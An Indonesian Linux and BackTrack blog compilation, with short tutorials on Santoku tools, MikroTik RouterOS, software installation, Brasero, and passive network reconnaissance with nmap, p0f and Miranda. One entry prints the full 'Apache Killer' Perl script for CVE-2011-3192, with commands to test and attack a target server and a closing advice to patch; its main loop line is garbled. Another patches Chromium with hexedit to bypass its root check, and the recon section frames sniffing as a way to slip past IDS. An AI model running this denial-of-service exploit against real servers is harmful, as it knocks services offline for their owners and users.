Entri Populer

Snippet

 Santoku Linux - Mobile forensik, Mobile Malware, Mobile Security


       Santoku adalah sebuah platform untuk mobile forensik, analisis malware mobile dan penilaian aplikasi keamanan mobile. The Santoku bebas Community Edition merupakan sebuah proyek kolaboratif untuk menyediakan lingkungan pra-konfigurasi Linux dengan utilitas, driver dan panduan untuk daerah-daerah. Rilis alpha didasarkan pada garpu dari distro OWASPMobiSec.


         Kata Santoku atau pisau longgar diterjemahkan sebagai 'tiga kebajikan' atau 'tiga penggunaan'. Santoku Linux telah dibuat untuk mendukung Anda dalam tiga upaya:

Mobile Forensik

Alat untuk memperoleh dan menganalisis data

  • Firmware berkedip alat untuk beberapa produsen
  • Pencitraan alat untuk NAND, media kartu, dan RAM
  • Gratis versi beberapa alat forensik komersial
  • Berguna script dan utilitas yang dirancang khusus untuk ponsel forensik

Mobile Malware

Alat untuk memeriksa malware mobile

  • Perangkat mobile emulator
  • Utilitas untuk mensimulasikan layanan jaringan untuk analisis dinamis
  • Dekompilasi dan alat pembongkaran
  • Akses ke database malware

Mobile Security

Penilaian aplikasi mobile

  • Dekompilasi dan alat pembongkaran
  • Script untuk mendeteksi masalah-masalah umum dalam aplikasi mobile
  • Script untuk mengotomatisasi mendekripsi binari, penggelaran aplikasi, menyebutkan rincian aplikasi, dan lebih



Development Tools:
  • Android SDK Manager
  • BlackBerry JDE
  • BlackBerry Tablet OS SDK
  • BlackBerry WebWorks
  • DroidBox
  • Eclipse IDE
  • Windows Phone SDK
  • Android 2.3.3, 3.2, and 4.0.3 Emulators
  • SecurityCompass Lab Server (HTTP and HTTPS)
  • BlackBerry Ripple
  • BlackBerry Simulators
Penetration Testing:
  • CeWL
  • DirBuster
  • Fierce
  • Nikto
  • nmap
  • Burp Suite
  • Mallory
  • w3af Console
  • w3af GUI
  • ZAP
  • BeEF
  • Ettercap
  • iSniff
  • Metasploit Console
  • Metasploit GUI
  • NetSed
  • SET
  • SQLMap
  • SSLStrip
Reverse Engineering:
  • APK Tool
  • Dex2Jar
  • Flawfinder
  • Java Decompiler
  • Strace
Wireless Analyzers:
  • Aircrack-ng
  • Kismet
  • Ubertooth Kismet
  • Ubertooth Spectrum Analyzer
  • Wireshark
Device Forensics:
  • AFLogical Open Source Edition
  • Android Encryption Brute Force
  • BitPim
  • BlackBerry Desktop Manager
  • Foremost
  • iPhone Backup Analyzer
  • MIAT
  • Paraben Device Seizure
  • Sift Workstation
  • Sleuth Kit
  • SQLiteSpy
Mobile Infrastructure:
  • BES Express
  • Google Mobile Management
  • iPhone Configuration Tool
===========================

Install Ubuntu Software Center Di Linux Mint 12

Ubuntu Software Center adalah sebuah antarmuka yang memungkinkan pengguna Ubuntu untuk menginstal aplikasi berbayar atau gratis dan banyak permainan. Jika Anda ingin menjalankan Ubuntu Software Center di sistem Linux Mint 12 (disini saya menggunakan Mint versi 12), maka mungkin ini akan membantu anda :

1. Di Linux Mint 12, buka terminal dan menginstal Ubuntu Software Center dengan perintah ini:

sudo apt-get install software-center
2. Sekarang jalankan perintah ini untuk membuat file LinuxMint.py:
sudo cp -r /usr/share/software-center/softwarecenter/distro/Ubuntu.py /usr/share/software-center/softwarecenter/distro/LinuxMint.py 

3. Sekarang edit file tadi dengan perintah ini:
gksudo gedit /usr/share/software-center/softwarecenter/distro/LinuxMint.py
4. Sekarang cari tulisan ini:
>> class Ubuntu(Debian)

 Dan ganti dengan ini:
 >> class LinuxMint(Debian)


5. Simpan file Anda dan keluar. Anda sekarang dapat menggunakan Ubuntu Software Center di Linux Mint 12.

Semoga bermanfaatSource.  

MikroTik RouterOS™, merupakan sistem operasi Linux base yang diperuntukkan sebagai network router. Didesain untuk memberikan kemudahan bagi penggunanya. Administrasinya bisa dilakukan melalui Windows Application (WinBox). Selain itu instalasi dapat dilakukan pada Standard komputer PC (Personal Computer). PC yang akan dijadikan router mikrotik pun tidak memerlukan resource yang cukup besar untuk penggunaan standard, misalnya hanya sebagai gateway. Untuk keperluan beban yang besar (network yang kompleks, routing yang rumit) disarankan untuk mempertimbangkan pemilihan resource PC yang memadai.


Sejarah MikroTik RouterOS
MikroTik adalah sebuah perusahaan kecil berkantor pusat di Latvia, bersebelahan dengan Rusia. Pembentukannya diprakarsai oleh John Trully dan Arnis Riekstins. John Trully adalah seorang berkewarganegaraan Amerika yang berimigrasi ke Latvia. Di Latvia ia berjumpa dengan Arnis, Seorang darjana Fisika dan Mekanik sekitar tahun 1995.


John dan Arnis mulai me-routing dunia pada tahun 1996 (misi MikroTik adalah me-routing seluruh dunia). Mulai dengan sistem Linux dan MS-DOS yang dikombinasikan dengan teknologi Wireless-LAN (WLAN) Aeronet berkecepatan 2 Mbps di Moldova, negara tetangga Latvia, baru kemudian melayani lima pelanggannya di Latvia.
Prinsip dasar mereka bukan membuat Wireless ISP (W-ISP), tetapi membuat program router yang handal dan dapat dijalankan diseluruh dunia. Latvia hanya merupakan tempat eksperimen John dan Arnis, karena saat ini mereka sudah membantu negara-negara lain termasuk Srilanka yang melayani sekitar 400 pengguna.


Linux yang pertama kali digunakan adalah Kernel 2.2 yang dikembangkan secara bersama-sama dengan bantuan 5-15 orang staff Research and Development (R&D) MikroTik yang sekarang menguasai dunia routing di negara-negara berkembang. Menurut Arnis, selain staf di lingkungan MikroTik, mereka juga merekrut tenega-tenaga lepas dan pihak ketiga yang dengan intensif mengembangkan MikroTik secara marathon.

JENIS-JENIS MIKROTIK

  1. MikroTik RouterOS yang berbentuk software yang dapat di-download di www.mikrotik.com. Dapat diinstal pada kompuetr rumahan (PC). 
  2. BUILT-IN Hardware MikroTik dalam bentuk perangkat keras yang khusus dikemas dalam board router yang didalamnya sudah terinstal MikroTik RouterOS. 


FITUR-FITUR MIKROTIK

  1. Address List : Pengelompokan IP Address berdasarkan nama
  2. Asynchronous : Mendukung serial PPP dial-in / dial-out, dengan otentikasi CHAP, PAP, MSCHAPv1 dan MSCHAPv2, Radius, dial on demand, modem pool hingga 128 ports.
  3. Bonding : Mendukung dalam pengkombinasian beberapa antarmuka ethernet ke dalam 1 pipa pada koneksi cepat.


  • Bridge : Mendukung fungsi bridge spinning tree, multiple bridge interface, bridging firewalling.
  • Data Rate Management : QoS berbasis HTB dengan penggunaan burst, PCQ, RED, SFQ, FIFO queue, CIR, MIR, limit antar peer to peer
  • DHCP : Mendukung DHCP tiap antarmuka; DHCP Relay; DHCP Client, multiple network DHCP; static and dynamic DHCP leases.
  • Firewall dan NAT : Mendukung pemfilteran koneksi peer to peer, source NAT dan destination NAT. Mampu memfilter berdasarkan MAC, IP address, range port, protokol IP, pemilihan opsi protokol seperti ICMP, TCP Flags dan MSS.
  • Hotspot : Hotspot gateway dengan otentikasi RADIUS. Mendukung limit data rate, SSL ,HTTPS.
  • IPSec : Protokol AH dan ESP untuk IPSec; MODP Diffie-Hellmann groups 1, 2, 5; MD5 dan algoritma SHA1 hashing; algoritma enkirpsi menggunakan DES, 3DES, AES-128, AES-192, AES-256; Perfect Forwarding Secresy (PFS) MODP groups 1, 2,5

  1. ISDN : mendukung ISDN dial-in/dial-out. Dengan otentikasi PAP, CHAP, MSCHAPv1 dan MSCHAPv2, Radius. Mendukung 128K bundle, Cisco HDLC, x751, x75ui, x75bui line protokol. 
  2. M3P : MikroTik Protokol Paket Packer untuk wireless links dan ethernet. 
  3. MNDP : MikroTik Discovery Neighbour Protokol, juga mendukung Cisco Discovery Protokol (CDP). 
  4. Monitoring / Accounting : Laporan Traffic IP, log, statistik graph yang dapat diakses melalui HTTP. 
  5. NTP : Network Time Protokol untuk server dan clients; sinkronisasi menggunakan system GPS. 
  6. Poin to Point Tunneling Protocol : PPTP, PPPoE dan L2TP Access Consentrator; protokol otentikasi menggunakan PAP, CHAP, MSCHAPv1, MSCHAPv2; otentikasi dan laporan Radius; enkripsi MPPE; kompresi untuk PPoE; limit data rate. 
  7. Proxy : Cache untuk FTP dan HTTP proxy server, HTTPS proxy; transparent proxy untuk DNS dan HTTP; mendukung protokol SOCKS; mendukung parent proxy; static DNS. 
  8. Routing : Routing statik dan dinamik; RIP v1/v2, OSPF v2, BGP v4. 
  9. SDSL : Mendukung Single Line DSL; mode pemutusan jalur koneksi dan jaringan. 
  10. Simple Tunnel : Tunnel IPIP dan EoIP (Ethernet over IP). 
  11. SNMP : Simple Network Monitoring Protocol mode akses read-only. 
  12. Synchronous : V.35, V.24, E1/T1, X21, DS3 (T3) media ttypes; sync-PPP, Cisco HDLC; Frame Relay line protokol; ANSI-617d (ANDI atau annex D) dan Q933a (CCITT atau annex A); Frame Relay jenis LMI. 
  13. Tool : Ping, Traceroute; bandwidth test; ping flood; telnet; SSH; packet sniffer; Dinamik DNS update. 
  14. UPnP : Mendukung antarmuka Universal Plug and Play. 
  15. VLAN : Mendukung Virtual LAN IEEE 802.1q untuk jaringan ethernet dan wireless; multiple VLAN; VLAN bridging. 
  16. VoIP : Mendukung aplikasi voice over IP. 
  17. VRRP : Mendukung Virtual Router Redudant Protocol. 
  18. WinBox : Aplikasi mode GUI untuk meremote dan mengkonfigurasi MikroTik RouterOS. 



Mengenal Miktorik Router OS
Mikrotik RouterOS adalah perangkat lunak yang memiliki berbagai fitur pengaturan jaringan. Mikrotik ROuterOS dapat diinstall pada komputer maupun perangkat khusus lainnya, sehingga komputer dapat berfungsi sebagai router yang handal. Berikut ini contoh dari mikrotik dalam bentuk Routerboard, dengan tipe RB450 dan RB 750













Adapun fitur dari Mikrotik Router OS itu sendiri adalah :
ROUTING
Static Router, Policy Router, ECMP, RIP, OSPF, BGP
FIREWALL
Mangle, Filter, Layer 7 Filtering, Address List, NAT
QUALITY OF SERVICE
Simple Queue, HTB, PFIFO, BFIFO, PCQ, SFQ, RED
WIRELESS NETWORK
PTP, PTMP, Nstream, Dual Nstrea, WDS
IP TUNNEL
PPTP, IPIP, IPSec, EoIP, L2TP, MPLS, OpenVPN
AUTHENTICATION
PPPoE, Hotspot, Radius
INTERFACE 
Gigabit, Ethernet, Wireless, V35, G703, ISDN, Dial UP, Bridge, Bonding, STP, RSTP
SERVICES
DHCP Server, IP Poll, Web proxy, DNS Cache 

Router didesain dengan system modular, sehingga dimungkinkan untuk menambah interface wireless sesuai dengan kebutuhan, hingga sebanyak jumlah slot minipci yang tersedia. Processor dan memori yang tersedia sebanding dengan kemampuan routerboard untuk mengalirkan koneksi data, baik sesuai dengan bps (bit per second) maupun pps (packet per second) nya. Tersediah pula kotak outdoor yang waterproof dengan soket Ethernet yang tahan cuaca. Ataupun kotak indoor yang ringkas untuk pemakaian didalam ruangan. Besarnya power wireless sesuai dengan jenis kartu yang digunakan. R52 dengan 65mWatt dan R52H dengan 350mWatt. 

Untuk instalasi Mikrotik pada harddisk, lebih baik menggunakan Disk on Module [DOM], kenapa demikian ??? 
Dikarenakan Mikrotik RouterOS mengikat pada harddisk, sehingga jika terdapat kerusakan pada harddisk maka kita membutuhkan lisensi yang baru untuk menginstall pada harddisk yang baru. Disk On Module [DOM] memiliki daya tahan yang jauh lebih baik dibanding dengan harddisk. Kalaupun terjadi kerusakan pada DOM selama 1 tahun, Mikrotik Indonesia akan mengganti DOM yang baru berikut dengan lisensinya.

Berikut ini gambar dari Disk On Module [DOM] :


Mikrotik merupakan solusi murah dengan fitur menarik, dengan semua fitur yang dipunya oleh Mikrotik RouterOS, hampir semua kerja pengaturan network dapat dilaksanakan. Dikarenakan fitur yang serba ada dan harga yang murah, banyak para Internet Service Provider [ISP], menggunakan device ini untuk keperluan routing dan bandwidth management. Perusahaan-perusahaan mid-low pun sangat cocok untuk menggunakan Mikrotik RouterOS ini.


Sumber http://www.wahanaweb.com

        Kali ini saya akan menulis cara menggunakan lxsplit, lxsplit adalah tool open source yg befungsi untuk membagi dan juga menggabungkan file. langsung saja ya . . . penjelasan lebih lanjut cari di google :D

install lxsplit dlu :

apt-get install lxsplit
syntaxnya :
#lxsplit (option) (namafile) (splitsize)


sudah dulu ya maaf klo singkat ^_^

1. Ekstrak file tar.gz tersebut, biasanya lewat file manager (konqueror atau nautilus). Tingal klik kanan pada file yang akan di ekstrak lalu pilih ekstrak here.atau bisa juga lewat terminal konsole

$ tar xzvf (nama file, contoh: visual.tar.gz)
2. Selanjutnya masuk ke folder/direktori yang telah di ekstrak tadi. Kemudian cari file README atau INSTALL yang merupakan petunjuk untuk menginstall file tersebut.

 3. Secara umum instalasi file telbar ( .tar gz atau .tar bz2) bisa dengan cara-cara berikut ini:
$ cd (nama folder yang di ekstrak)
$ ./configure
4. Pastikan tidak ada masalah. Jika ada file-file yang harus diinstall maka install terlebih dahulu file-file yang dibutuhkan. 5. Setelah selesai lalu lakukan komplasi :
$ make
6. lalu install (sebagai root)
$ su
$ make install
dan akhirnya file pun terinstall. bila file gagal terinstal berarti ada langkah-langkah yang terlewat dan belum dilakasanakan. maka untuk itu periksa dengan teliti langkah-langkah instalasi di file README atau INSTALL.

NOTE : bila pada tahap ke 3 tdk bisa langsung ke tahap 4 saja.

Ketika kita selesai menginstall Backtrack di Laptop atau komputer kita masalah yang selalu di hadapi adalah tidak keluarnya suara di Backtrack 5 kita. Tenang jangan panik, itu karena setingan PulseAudio kita belum di setting. Carannya akan saya jelaskan di bawah ini :

Yang pertama kita cek dulu apakah sound kita sudah aktif apa belum? klik pada icon sound yang ada di kanan atas panel, kemudian klik preference. Jika keluar gambar seperti yang ada di bawah ini maka sound kita belum bisa di detect.



Jika keluar warning seperti yang terlihat pada gambar diatas, masuk aja ke System >> Preferences >> Startup Application
Kemudian kik Add dan akan muncul seperti pada gambar yang ada di bawah ini.



Isikan PulseAudio di bagian Name , dan pada Command di isi /usr/bin/pulseaudio. Dan klik Add
dan PulseAudio sudah di tambahkan di Startup Application.


setelah itu reboot Pc/Leptop anda.


Selamat mencoba ^_-

sumber IBTEAM dan www.candradwiwaskito.com

Bagi anda pengguna backtrack yang kepengen make web browser chromium, silahkan ikuti langkah2 di bwah ini

1. Install chromium browser
ketikkan perintah berikut di terminal (tentunya harus terkoneksi internet)

$apt-get install chromium-browser


2. jika chromium langsung dijalankan, maka akan muncul error karena chromium secara defaut tidak boleh dijalankan pada hak akses root. maka lakukan langkah berikut :



3. masuk ke folder chromium-browser
ketikkan perintah berikut ini didalam terminal

$cd /usr/lib/chromium-browser


4. edit file chromium dengan menggunakan hexedit
ketikkan perintah berikut ini didalam terminal

$hexedit chromium-browser


5. tekan tab untuk pindah ke dalam mode string

6. tekan ctrl+s untuk melakukan pencarian geteuid



7. ubah geteuid dengan getppid



8. tekan crtl+x dan save tekan Y


Dan untuk VLC player

1. Install VLC player dlu

$sudo apt-get install vlc


2. hampir sama dengan Chronium di atas td VLC juga tdk dapat dijalankan bila dalam user root

3. edit VLC dengan mengunakan hexedit di terminal
$hexedit /usr/bin/vlc

4. tinggal ulangi cara yg diatas td sama kok :D

semoga bermanfaat :D

Sumber : 9oBl4ck@IBTEAM

Hy . . . . Linuxer :P

ada file-file sekolah, kuliah atau kantor om mau di jadiin pdf...? dan masih baru dilingkungan linux?, hmm kita sama ^_^ yuk sama-sama belajar linux ^_-

Untuk membuat file PDF om dapat menggunakan aplikas openoffice.org.
yg blom install openoffice silakan install dlu.

apt-get install openoffice.org


selesai nginstall om silakan menjalankan openoffice tersebut ada di
Aplications -> office -> OpenOffice.org Word Processor


truss terserah om mau nulis apa :) na klo udah mau di jadiin file PDF
om tinggal klik File -> Export As PDF...




dan juga om dapat memberi password pada file pdf om :P
ada di PDF Options trus ke tab Security, silakan set password om.



trus klo udah tinggal Klik Export, dan tentuin dimana om mau simpan itu file

makasih ya, moga2 bermanfaat :)

Thanks IBTEAM

Apa itu bt5-fixit?
Saya beri sedikit penjelasan mengenai hal tersebut.

Are you using BT5-Gnome and find that many of the tools are either missing or out of date? If the answer is yes then use this bt5-fixit.sh script to add many missing tools and replace the installed tools with their svn counter parts.

Just a few of the many tools that are missing that this script gives you the option to add:
RDP client, netwox, netsed, calculator, ssh-keys, missing drivers, arp-scan, gnomeVNC server, UbuntuFirewall, p7zip, screen, file-roller, wifite, open-vas, pyrite…. the list goes on!


Nah, sudah mengerti ? :D


Baik, kita akan mencobah tool ini ^_-

pertama2 kita download dlu toolnya, caranya :

Terminal :D
syntax : #svn checkout http://bt5-fixit.googlecode.com/svn/trunk/ bt5-fixit


setelah selesai kita ke direktoriNya

root@bt:~# cd bt5-fixit
root@bt:~/bt5-fixit# ls
bt5-fixit.sh bt5-nfsenum.sh bt5-nmap.sh nix-auditor.sh
root@bt:~/bt5-fixit#


perhatikan ada 4 file dari hasil unduhan td, di sini kita akan mencoba menggunakan bt5-fixit

lanjut di terminal td, kita jalankan tool tersebut :D

root@bt:~/bt5-fixit# ./bt5-fixit.sh


Pada saat pertama kali dijalankan, aplikasi meminta izin untuk menambakan beberapa repositori pendukung.
Dan saat penambahan repositori selesai, kita akan disuguhkan beberapa menu utama.



setelah itu sesuka anda yg mana mu di fix :D

cukup sekian, moga2 bermanfaat ^_^ TQ

Sumber
THJC
indonesianbacktrack.or.id
http://code.google.com/p/bt5-fixit

Sekedar info (mungkin sudah banyak yg tahu) kalau terdapat vulnerability pada Apache HTTP Server 1.3.x dan 2.x.x hingga 2.2.19.

klo di database vulnerability mitre.org nama vulnerabilitynya adalah CVE-2011-3192, lebih lengkapnya klik disini

vulnerability ini mengeksploitasi kelemahan Apache dalam menerima range request httpd, sehingga membuat prosesor dan memory server exhausted.

vulnerability ini telah dipatch oleh Apache.org dengan mengeluarkan versi terbaru 2.2.20 pada 31 Agustus 2011 kemarin.

berikut adalah skrip yg ada di Pastebin (sry link-nya ane lupa copy, google-fu aja),
namanya Apache Killer:


#!/usr/bin/perl

#Apache httpd Remote Denial of Service (CPU  & memory exhaustion)
#Original by Kingcope
#Altered by W
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use threads;

sub usage
{
print "Apache Remote Denial of Service (CPU & memory exhaustion)\n";
print "Originally by Kingcope\n";
print "Altered to use threads by W\n";
print "Usage: $0 [page=/] [threads=50]\n";
print "Example: $0 YES www.example.com index.html 50\n";
print "If attack is anything other than 'YES', then the tool will test and exit.\n";
}

sub testapache
{
print "Testing for partial content exploit against $host$path...\n";

my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => "80",
Proto    => 'tcp') or die "Can't open socket to $host!\n";

my $p = "HEAD $path HTTP/1.1\r\nHost: $host\r\nRange:bytes=0-5\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

my $x = <$sock>;
if ($x =~ /Partial/)
{
print "Host: $host appears to be vulnerable to partial content DoS\n";
return 1;
} else {
print "Host: $host appears to not be vulnerable, returned:\n$x";
return 0;
}
}

sub exploitserver
{
my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => "80",
Proto    => 'tcp') or return(0);
print $sock $p;

while(<$sock>)
{
}
print ".";
}

if($#ARGV < 1)
{
&usage && exit;
}

$real = ($ARGV[0] eq 'YES');
$host = $ARGV[1];
$path = ($#ARGV > 1) ? '/' . $ARGV[2] : '/';
$numthreads = ($#ARGV > 2) ? $ARGV[3] : 50;
$vuln = &testapache;

srand(time());
my $r = "";

for ($k=0;$k<1300 br="br" k="k">{
$r .= ",5-$k";
}

$p = "HEAD $path HTTP/1.1\r\nHost: $host\r\nRange:bytes=0-5$r\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
if($vuln && $real)
{
my @threads;
$|=1;

print "Running partial content exploit against $host$path using $numthreads threads\n";
for(my $n = 0; $n < $numthreads; $n++)
{
my $thr = async { while(1){ &exploitserver; } };
push(@threads, $thr);
}
foreach(@threads)
{
$_->join();
print($_);
}
}


cara penggunaan skrip diatas adalah:
1. untuk mengetahui apakah server web Apache tersebut vulnerable atau tidak
#perl filename.pl www.target.com

2. untuk melakukan eksploitasi
#perl filename.pl YES www.target.com

ni yg telah ane coba di localhost BT5 dengan Apache versi 2.2.14:


dan hasilnya seperti berikut:



lihat pada Cpu(s): 92.5%us dan Mem: 3094072k total, 2748296k used, 345776k free, lihat juga pada services Apache2 dengan PID berbeda-beda dibawahnya

processor dan RAM kita dibuat bekerja secara maksimal, hal ini pastinya akan menyebabkan server akan mengalami out of service…

jadi segera update Apache server anda :)

semoga bermanfaat

Sumber ikonspirasi.com

Brasero di linux merupakan aplikasi untuk membakar / burning file iso dll, kalao di winduz kita kenal yang dengan namanya Nero Burning "mbayar meneh" kalo gk bayar dosa "hahahah........" :P
namun berbeda dengan linux yang opensource memberikan solusi kemudahan dan free di includkan dengan paket distro ubuntu dan mint "free bukan berarti gratis ".
mantap pokoe,linux..........
^_^

Alat dan bahan :

CD/DVD kosong

CD/DVD RW ROM

File yang mau di burning


yuk mari ke TKP...

pastikan Brasero nya sudah terinstal di komputer anda klo belum . . . ?
ya install donk ^_^

syntax : #sudo apt-get update && apt-get install brasero

wess..? yo wes mari ^_-
masukkan CD/DVD kosong hingga system mendeteksi keberadaanya.

Step 1
langsung saja klik Application --> Sound & Video --> Brasero burning

Step 2
Klik tombol yang di perintahkan "click here to selec diskt image "

Step 3
Cari dimana kita meletakkan file iso yang ingin di burning --> open

Step 4
setting konfigurasi tmp "temprori" folder jangan lupa setting kecepatan tulisnya, jangan memilih max karena kwalitas dari hasilnya kurang bagus, pilih yang sedang saja --> close

Step 5
secara otomatis akan melakukan eksekusi installasi ke cd / dvd tunggu hingga proses selesai

semoga bermanfaan ^_^

Sumber rj45tux.blogspot.com

Apa itu Passive Sniffing? dan apa itu Broadcast Traffic?

1. Broadcast Traffic

Adalah lalu lintas data pada jaringan yang terdapat pada alamat broadcast (x.x.x.255), contoh pada ip range 192.168.10.0/24 maka alamat broadcastnya ada di 192.168.10.255. semua perangkat yang ada di dalam jaringan pasti melakukan komunikasi dengan alamat broadcast.

Dengan menangkap data yang ada di alamat broadcast maka aktifitas kita akan susah untuk diketahui oleh IDS/IPS karena data yang dihasilkan sangat sedikit, hal ini terjadi karena secara pasif kita menangkap data yang lewat dan bukan melakukan scanning secara intrusive.

Cara melakukannya?

A. Nmap

Salah satunya adalah dengan Nmap, perintahnya adalah seperti berikut:

#nmap -Pn -n --script=broadcast

Hasilnya dapat dilihat seperti pada gambar dibawah:



Pada gambar dapat dilihat bahwa:

ip 192.168.10.192 mendapatkan DHCP dari 192.168.10.1 dimana DNS yang digunakan adalah 8.8.8.8 dan 208.67.222.222.
ip 192.168.10.1 memiliki nama “Server: RouterOS/4.10UPnP/1.0 MikroTik UPnP/1.0″, berarti gateway yang digunakan kemungkinan mikrotik.
ip 192.168.10.207 adalah ip BT5 saya.

Dengan menangkap lalu lintas data pada alamat broadcast diatas, kita dapatkan beberapa hal yang cukup berguna untuk langkah penetrasi selanjutnya.

B. Ping

Ping? ga salah ketik nih?

TTL atau Time To Live yang dapat dilihat untuk menentukan kira-kira OS apa yang digunakan, biasanya OS Windows menggunakan TTL sekitar 128 sedangkan Linux menggunakan TTL dibawah sekitar 64 atau sekitar 254

Ga percaya??

Contoh pada Linux:

$ ping 192.168.1.215
PING localhost (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_seq=1 ttl=64 time=0.056 ms
64 bytes from localhost (127.0.0.1): icmp_seq=2 ttl=64 time=0.041 ms
64 bytes from localhost (127.0.0.1): icmp_seq=3 ttl=64 time=0.029 ms
64 bytes from localhost (127.0.0.1): icmp_seq=4 ttl=64 time=0.049 ms
64 bytes from localhost (127.0.0.1): icmp_seq=5 ttl=64 time=0.040 ms
^C
--- localhost ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 3999ms
rtt min/avg/max/mdev = 0.029/0.043/0.056/0.009 ms


Contoh pada OS Windows:

$ ping 10.112.12.30 PING 10.112.12.30 (10.112.12.30): 56 data bytes 64 bytes from 10.112.12.30: icmp_seq=0 ttl=128 time=0.622 ms 64 bytes from 10.112.12.30: icmp_seq=1 ttl=128 time=0.786 ms 64 bytes from 10.112.12.30: icmp_seq=2 ttl=128 time=0.704 ms 64 bytes from 10.112.12.30: icmp_seq=3 ttl=128 time=0.510 ms 64 bytes from 10.112.12.30: icmp_seq=4 ttl=128 time=0.913 ms ^C --- 10.112.12.30 ping statistics --- 5 packets transmitted, 5 packets received, 0.0% packet loss round-trip min/avg/max/stddev = 0.510/0.707/0.913/0.138 ms


Perhatikan pada TTL-nya, menarik bukan? :D


2. Passive Sniffing

Metode yang dilakukan hampir sama, karena non intrusive, hanya menangkap data yang lewat saja.

So, how we do it exactly?

Saya tahu ada beberapa tools yang dapat melakukan ini, seperti wireshark, p0f, miranda, tcpdump dll. Kali ini akan dibahas p0f dan miranda (UPnP).

A. p0f

Kebetulan baru muncul versi 3.03b, download saja disini. trus di-extract saja (file berupa .tar.gz):

1 tar xvf p0f-3.03b

Kemudian untuk membuat file executable p0f tinggal jalankan file build.sh di dalam folder hasil extract diatas:

1 ./build.sh

Seharusnya muncul seperti berikut:

root@bt:~/Programs/p0f-3.03b# ./build.sh
Welcome to the build script for p0f 3.03b!
Copyright (C) 2012 by Michal Zalewski

[+] Configuring production build.
[*] Checking for a sane build environment... OK
[*] Checking for working GCC... OK
[*] Checking for *modern* GCC... OK
[*] Checking if memory alignment is required... nope
[*] Checking for working libpcap... OK
[*] Checking for working BPF... OK
[+] Okay, you seem to be good to go. Fingers crossed!
[*] Compiling p0f... OK

Well, that's it. Be sure to review README. If you run into any problems, you
can reach the author at .


Setelah itu akan muncul file executable p0f, jalankan saja file p0f-nya:

1 ./p0f -h

Perintah diatas untuk melihat options yang terdapat pada p0f, dapat dilihat dibawah ini:

root@bt:~/Programs/p0f-3.03b# ./p0f --h
--- p0f 3.03b by Michal Zalewski ---

./p0f: invalid option -- '-'
Usage: p0f [ ...options... ] [ 'filter rule' ]

Network interface options:

-i iface - listen on the specified network interface
-r file - read offline pcap data from a given file
-p - put the listening interface in promiscuous mode
-L - list all available interfaces

Operating mode and output settings:

-f file - read fingerprint database from 'file' (p0f.fp)
-o file - write information to the specified log file
-s name - answer to API queries at a named unix socket
-u user - switch to the specified unprivileged account and chroot
-d - fork into background (requires -o or -s)

Performance-related options:

-S limit - limit number of parallel API connections (20)
-t c,h - set connection / host cache age limits (30s,120m)
-m c,h - cap the number of active connections / hosts (1000,10000)

Optional filter expressions (man tcpdump) can be specified in the command
line to prevent p0f from looking at incidental network traffic.

Problems? You can reach the author at .


Mari kita coba dengan perintah -i eth0 jika network card ada di eth0, lalu -p atau promiscouse mode agar semua trafik dapat ditangkap oleh p0f dan -o untuk menyimpan hasil sniffing, dapat dicoba seperti berikut:

1 ./p0f -i eth0 -p -o p0f-internal



Perintah -f tidak perlu dilakukan karena secara default p0f akan menggunakan file konfigurasi p0f.fp, kecuali kalau kita ingin menggunakan signature database packet data yang lain.

Dari data diatas mari kita coba lakukan analisa:

.-[ 192.168.10.207/49659 -> 76.74.255.117/443 (syn) ]-
|
| client = 192.168.10.207/49659
| os = Linux 3.x
| dist = 0
| params = none
| raw_sig = 4:64+0:0:1460:mss*10,6:mss,sok,ts,nop,ws:df,id+:0
|
`—-


Arti data diatas kira-kira begini:

ip 192.168.10.207 port 49659 sedang melakukan koneksi SYN terhadap ip 76.74.255.117 port 443
OS yg digunakan Linux 3.x
Jarak dengan sniffer 0 (alias 1 network)
raw_sig adalah suatu signature (tanda) yang dihasilkan oleh OS tersebut ketika melakukan komunikasi di dalam jaringan.

Sebenarnya masih banyak yang bisa dilihat dari data yang ditangkap oleh p0f, dapat dilihat disini, tepatnya di no. 2 “What’s the Output?”

B. Miranda

Miranda adalah tools yang dibuat dari bahasa pemrograman Python untuk menangkap data protokol UPnP (Universal Plug n Play).

Perangkat apa saja yang menggunakan protokol UPnP??

Karena sifatnya yang plug n play maka perangkat yang menggunakan protokol ini mulai dari komputer, network home appliances (tv internet, nintendo wii dll) dan perangkat wireless lainnya.

Bayangkan saja kita bisa melakukan sniffing di suatu jaringan wifi yang terdapat tv internet yang terhubung dengan wifi tersebut, maka mungkin saja bagi kita untuk melakukan remote seperti mematikan tv, menyetel volume tv dll. Ngeri kan?? hehehe #ketawasetan

Walaupun saya belum pernah melakukannya secara langsung (maklum ga punya tv internet), tetapi ada PoC dari website Pauldotcom yang akan saya coba tulis disini:

Di BT5 Miranda ada di folder /pentest/enumeration/miranda/

Cara menjalankan miranda tinggal:

./miranda.py[code]

Setelah itu kita akan masuk kedalam shell prompt upnp>

Perintah-perintah yang dapat dilakukan di miranda adalah sebagai berikut:

[code]

root@bt:/pentest/enumeration/miranda# ./miranda.py
upnp> ?

Invalid command. Valid commands are:

load Restore previous host data from file
head Show/define SSDP headers
help Show program help
host View and send host list and host information
msearch Actively locate UPNP hosts
pcap Passively listen for UPNP hosts
quit Exit this shell
log Logs user-supplied commands to a log file
seti Show/define application settings
exit Exit this shell
save Save current host data to file


Untuk melakukan sniffing di miranda adalah dengan menjalankan perintah msearch seperti berikut:
upnp> msearch
Entering discovery mode for ‘upnp:rootdevice’, Ctl+C to stop… **************************************************************** SSDP reply message from 192.168.1.213:8060 XML file is located at http://192.168.1.213:8060/ Device is running Roku UPnP/1.0 MiniUPnPd/1.4 **************************************************************** **************************************************************** SSDP reply message from 192.168.1.224:52236 XML file is located at http://192.168.1.224:52236/rcr/RemoteControlReceiver.xml Device is running Linux/9.0 UPnP/1.0 PROTOTYPE/1.0 **************************************************************** **************************************************************** SSDP reply message from 192.168.1.214:52235 XML file is located at http://192.168.1.214:52235/dmr/SamsungMRDesc.xml Device is running Linux/9.0 UPnP/1.0 PROTOTYPE/1.0 ****************************************************************

Kemudian lakukan host list untuk melihat host mana saja yang telah diketahui oleh miranda:
upnp> host list
[0] 192.168.1.213:8060
[1] 192.168.1.219:8060
